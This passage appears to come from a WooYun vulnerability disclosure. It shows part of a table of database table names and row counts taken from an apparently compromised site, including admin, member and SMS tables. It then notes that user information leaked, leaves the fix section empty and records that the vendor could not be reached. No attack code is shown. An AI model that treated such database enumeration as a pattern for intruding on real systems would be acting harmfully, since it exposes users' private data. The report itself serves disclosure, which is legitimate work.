| T_STADIUMHIERARCHY | 9 |
| PLAY_NOTICE | 8 |
| T_ADMINUSER | 8 |
| T_GIVEMONEYINFO | 8 |
| TEAM_ACTIVITIES | 8 |
| COMMUNITY_INDEX | 7 |
| FL_QY_WELFARETYPEMAX | 7 |
| H_LIST_MODULE | 7 |
| DOWNLOADRECORD | 5 |
| EXCEPTION_PROCESSING | 5 |
| FRIEND_GROUPS | 5 |
| ITEM_TEMP_YN | 5 |
| PX_HITEGG_SURVEY_AW | 5 |
| T_JS_OPERATINGCONFIG_USER | 5 |
| T_XT_CATEGORY | 5 |
| T_XT_ROLE | 5 |
| VENUE_PLACE | 5 |
| REGISTRATIONINFORMATION | 4 |
| T_HJ_ZF | 4 |
| T_MEMBERINFO | 4 |
| T_MEMBERTYPE | 4 |
| T_SENDADMINSMS | 4 |
| FL_SH_FORECLOSURE | 3 |
| QUESTIONNAIRE_BATCH | 3 |
| SMS_BATCH | 3 |
| HC_BASEDTL | 2 |
| HC_BASEMST | 2 |
| ORDERSETTING | 2 |
| PX_SURVEY | 2 |
| T_XT_PROVIDERACCOUNT | 2 |
| KNOWLEDGECATAGRY | 1 |
| PX_COOPERATION | 1 |
| PX_HITEGG_SURVEY | 1 |
| T_HJ_NAME | 1 |
| T_TXFL_OPENDATE | 1 |
| T_XT_ORGACCOUNTRELEVANCE | 1 |
| T_XT_PROVIDER | 1 |
+--------------------------------+---------+


泄露用户信息

3.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)